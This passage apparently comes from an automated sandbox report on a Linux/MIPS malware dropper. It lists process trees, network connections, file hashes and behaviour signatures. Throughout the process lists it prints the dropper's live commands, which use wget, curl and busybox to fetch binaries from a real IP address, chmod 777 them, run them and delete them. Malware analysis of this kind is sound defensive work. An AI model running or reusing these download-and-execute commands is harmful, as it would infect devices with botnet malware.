[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/chmod
[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/rm
[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/wget
[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/chmod
[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/bin/rm
[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]
/usr/bin/wget
[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/chmod
[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/rm
[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/wget
[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/chmod
[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/rm
[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/wget
[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/chmod
[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
/bin/rm
[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 02:53
Reported
2024-11-14 02:56
Platform
debian9-mipsel-20240611-en
Max time kernel
135s
Max time network
138s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | N/A |
| N/A | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | N/A |
| N/A | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | N/A |
| N/A | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | N/A |
| N/A | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | N/A |
| N/A | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | N/A |
| N/A | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | N/A |
| N/A | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | N/A |
| N/A | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | N/A |
| N/A | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | N/A |
| N/A | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | N/A |
| N/A | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | N/A |
| N/A | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | N/A |
| N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | N/A |
| N/A | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | N/A |
| N/A | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | N/A |
| N/A | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | N/A |
| N/A | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | N/A |
| N/A | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | N/A |
| N/A | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | N/A |
| N/A | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | N/A |
| N/A | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | N/A |
| N/A | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | N/A |
| N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | N/A |
| N/A | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | N/A |
| N/A | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /usr/bin/curl | N/A |
| File opened for modification | /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db | /usr/bin/curl | N/A |
Processes
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/chmod
[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/bin/rm
[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]
/usr/bin/wget
[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/chmod
[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/bin/rm
[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]
/usr/bin/wget
[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/chmod
[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/bin/rm
[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]
/usr/bin/wget
[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/chmod
[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/bin/rm
[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]
/usr/bin/wget
[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/chmod
[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/bin/rm
[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]
/usr/bin/wget
[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/chmod
[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/bin/rm
[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]
/usr/bin/wget
[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/chmod
[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/bin/rm
[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]
/usr/bin/wget
[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/chmod
[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/bin/rm
[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]
/usr/bin/wget
[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/chmod
[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/bin/rm
[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]
/usr/bin/wget
[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/chmod
[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/bin/rm
[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]
/usr/bin/wget
[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/chmod
[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/bin/rm
[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]
/usr/bin/wget
[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]
/bin/busybox
